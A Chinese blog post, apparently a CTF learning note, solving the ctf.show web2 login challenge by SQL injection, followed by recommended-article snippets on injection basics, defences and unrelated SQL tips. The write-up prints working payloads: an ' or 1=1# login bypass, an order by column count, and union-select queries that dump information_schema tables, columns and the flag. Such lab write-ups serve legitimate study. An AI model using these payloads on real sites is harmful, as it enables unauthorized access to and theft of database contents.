第四天基础sql注入

最新推荐文章于 2024-11-14 15:52:04 发布
最新推荐文章于 2024-11-14 15:52:04 发布
阅读量104 收藏
点赞数
分类专栏: CTF学习笔记 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/NYG694/article/details/131689237
版权

ctf.show_web2

    

题目进来是这样的一个网页,这里我们要知道一个知识点,sql注入是关于数据库的一种漏洞所产生的,而对于一般判断登陆时。看下这篇文章你会有一个基础概念。

SQL注入(一)—— sql手动注入实操_Genevieve_xiao的博客-CSDN博客

 

 

1' or 1=1# 万能试金石

因此你输入进去你会发现会变成 select *from user where id='1' or 1=1#'

那么就可以满足后面1=1永远成立,那么就会返回true,就能正确登录,#是注释所以后面全部可以不看。1后面的’与前面‘进行闭合,有些是分字符型和数字型的,做多了你自己就可以发现。所以,这登录存在了sql漏洞,我们能用联合语句进行查询数据库操作,需要数据库知识,请提前学习。

第一步, 判断注入点
用户名输入以上payload, 使SQL恒成立, 这里密码不用输,因为它为了简单只需要账户就行,但正常生活中肯定不是这样的,这里就是提供一个思路。

这里首先我们要知道表名,要知道有哪些表,找到密码储存的地方。

所以首先来一个脱库

获取当前使用的数据库, 盲猜flag就在当前使用的数据库中, 用户名输入以下payload, 密码不用输

a' union select 1,database(),3 #

这个为什么是三个,这个就需要用 ' or 1=1 order by 3#来进行判断

order by是mysql中对查询数据进行排序的方法,也可以通过是否回显判断有几个

然后执行payload后出现

在这里插入图片描述

web2就是当前数据库

2.获取数据库web2中的表

a'  union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='web2'),3#

在这里插入图片描述 

3.获取表flag中的字段, 很明显flag就在flag表中

a'  union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='web2' and table_name='flag' ),3#

在这里插入图片描述

4.获取表flag中的字段, 很明显flag就在flag表中

a' union select 1,(select flag from flag),3 #

得到flag 

 

SQL注入攻击与防御 第2版》PDF版本下载.txt
07-17
#### 四、SQL注入的防御措施 1. **参数化查询**:使用预编译语句和参数绑定,确保用户输入的数据不会被解释为SQL代码。 2. **输入验证**:对所有用户输入进行严格的验证,只允许符合规则的数据进入系统。 3. **最小...
sql注入网站源码
04-09
7. **代码审计**:定期进行代码审查,查找可能的SQL注入漏洞,尤其是在使用第三方库或组件时。 8. **Web应用防火墙(WAF)**:可以配置WAF来检测并阻止SQL注入攻击,但不应完全依赖它,因为攻击者可能找到绕过WAF的...
sql注入详解
热门推荐
内心不种满鲜花就会长满杂草
05-05 22万+
SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
sql注入基础原理(超详细)
会哭的雨@的博客
05-17 13万+
一、Sql注入简介 Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一。 二、Web 程序三层架构 三层架构(3-tier architecture) 通常意义上就是将整个业务应用划分为: 界面层(User Interface layer) 业务逻辑层(Busi...
sql注入基础学习
qq_48257021的博客
03-10 1478
4.判断一下数据库中的表,网址后加上:and (select count(*) from admin) 0返回正常,说明存在admin表。and (select count(*) from admin where ascii(substr(name,2,1))>=100)=1 结果为100,即字符d,重复上述过程,可以判断出帐号为admin。and (select count(*) from admin where ascii(substr(pwd,1,1))>=97)=1,返回正常,为字符a。
SQL注入入门基础
weixin_51583379的博客
10-19 1172
mysql中存在4个控制权限的表,分别为user表,db表,tables_priv表,columns_priv表, 我当前的版本mysql 5.7.22。mysql权限表的验证过程为:先从user表中的Host,User,Password这3个字段中判断连接的ip、用户名、密码是否存在,存在则通过验证。通过身份认证后,进行权限分配,按照user,db,tables_priv,columns_priv的顺序进行验证。
SQL注入基础
m0_74312676的博客
07-16 1218
可以看到页面并没有改变,这是因为我们的命令有两行显示,第一行应显示id=1的结果,第二行显示联合查询union select 1,2,3的结果,但是我们的页面只能显示一行的结果。字符型:提交and 1=1和提交 and1=2有回显(提交and 1=2时如果是字符型注入,则不能将1=2解析,就会默认为是对的,从而回显id=id的值;说明无法找到第十的列名,即没有第十列,我们逐步缩小范围,可以看到,当查询到4时依旧报错,但是查询到3时有正常的回显,即可得到,前面查询的列数为3。得到了三列,尝试查询:?
SQL注入基础和进阶.pdf
12-26
"SQL注入基础和进阶" SQL注入是指Web应用程序对用户输入的数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数带入数据库查询,那么攻击者可以通过构造不同的SQL语句来实现对数据库的任意操作。开发...
第六天 SQL注入
weixin_46653764的博客
05-28 750
一、sql注入的原理 不管是用什么语言编写的Web应用,它们都有一个共同点,就是具有交互性并且大多数是数据库驱动。在网络中,数据库驱动的Web应用随处可见,由此而存在的SQL注入是影响企业运营且最具破坏性的漏洞。 **sql注入**是一种通过操作sql语句进行攻击目的的技术 二、MYSQL注入--上部分 1、sql语句 创建数据库:CREATE DATABASE database_name 删除数据库:drop database database_name 创建新表:create table mytabl
4-5 SQL注入基础
小约翰呼噜噜的博客
09-18 335
4-5 SQL注入基础 1. SQL注入简介 1.1 什么是SQL SQL,结构化查询语言(Structured Query Language),是一种特殊的编程语言,用于关系型数据管理系统中的标准数据查询语言。但实际上不同数据库管理系统之间的SQL不能完全相互通用,但整体90%以上是通用的。 常见的关系型数据库:MySQL,ACCESS,MSSQL,Orcale等。 关系型数据库结构明显:库名|表名|字段名|字段内容。 1.2 什么是SQL注入 SQL注入SQL Injection)是一种常见的Web安
泛微OA8前台sql注入1
08-08
【泛微OA8前台SQL注入漏洞详解】 在网络安全领域,SQL注入是一种常见的攻击手段,它允许攻击者通过构造特定的输入来控制或篡改后台数据库的查询操作。在这个案例中,我们关注的是针对泛微OA8系统的一个前台SQL注入...
第四节 数据库基础SQL注入
qq_51450084的博客
12-20 336
SQL,力扣题目1107,每日新用户统计
m0_59659684的博客
11-13 299
activity 列是 ENUM 类型,可能取 ('login', 'logout', 'jobs', 'groups', 'homepage') 几个值之一。编写解决方案,找出从今天起最多 90 天内,每个日期该日期首次登录的用户数。2、思路:找出每个用户第一天登录的日期之后再进行过滤90天以内的日期。2、找出第一天登录日期与指定日期间隔90天以内的日期,并计算人数。1、CTE表达式 + 窗口函数 + datediff()1、找出用户第一天登录的日期。该表可能有重复的行。
PostgreSQL中表的数据量很大且索引过大时怎么办
★【World Of Moshow 郑锴】★
11-12 332
在PostgreSQL中,当表的数据量很大且索引过大时,合理评估和优化索引、使用部分索引、复合索引、调整填充因子、定期维护、使用表分区等策略可以显著提升性能。定期监控查询性能和数据库状态,以确保优化措施的有效性。
PostgreSQL 创建相同结构的表
云端的博客
11-11 1032
PostgreSQL 创建相同结构的表
PostgreSQL 事务读取行 不使用行锁 真的? 利弊双刃剑
sql server的专栏
11-11 1004
开头还是介绍一下群,如果感兴趣PolarDB ,MongoDB ,MySQL ,PostgreSQL ,Redis, OceanBase, Sql Server等有问题,有需求都可以加群群内有各大数据库行业大咖,可以解决你的问题。加群请联系 liuaustin3 ,(共2580人左右 1 + 2 + 3 + 4 +5 + 6 + 7+8) 新人进7群,开8群)最近一个同学问我一个问题,这也是练习题...
mysql查询语句(基础
2301_80141552的博客
11-11 288
1:查询一个表中的所有列,使用通配符 *select1:查询一个表中的所有列,使用通配符 *
121、SQL Server取开始时间、截止时间
最新发布
m0_57310426的博客
11-14 173
SELECT dateadd(ms,-3,DATEADD(mm, DATEDIFF(m,0,getdate())+1, 0)) 当月最后一天。SELECT dateadd(ms,-3,DATEADD(dd, DATEDIFF(dd,-1,getdate()), 0)) 当天结束。SELECT DATEADD(mm, DATEDIFF(mm,0,getdate()), 0) 当月第一天。dd,0,getdate()), 0)) 当天开始。
高级 SQL 技巧:提升数据查询与管理效率
qq_25699299的博客
11-13 253
掌握高级 SQL 技巧可以提升您在数据查询、分析和管理方面的能力。通过窗口函数、公共表表达式、索引、递归查询等技巧,您能够写出更高效、可读性更强的 SQL 语句。希望本文的分享能够激发您进一步探索 SQL 的兴趣,使您在数据分析和管理的路上走得更远。欢迎您在评论区分享您自己的 SQL 技巧和经验!
macOS系统下使用SQLark连接达梦数据库
ea8d1n3的博客
11-14 441
本文将简单介绍如何下载安装SQLark并连接达梦数据库
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值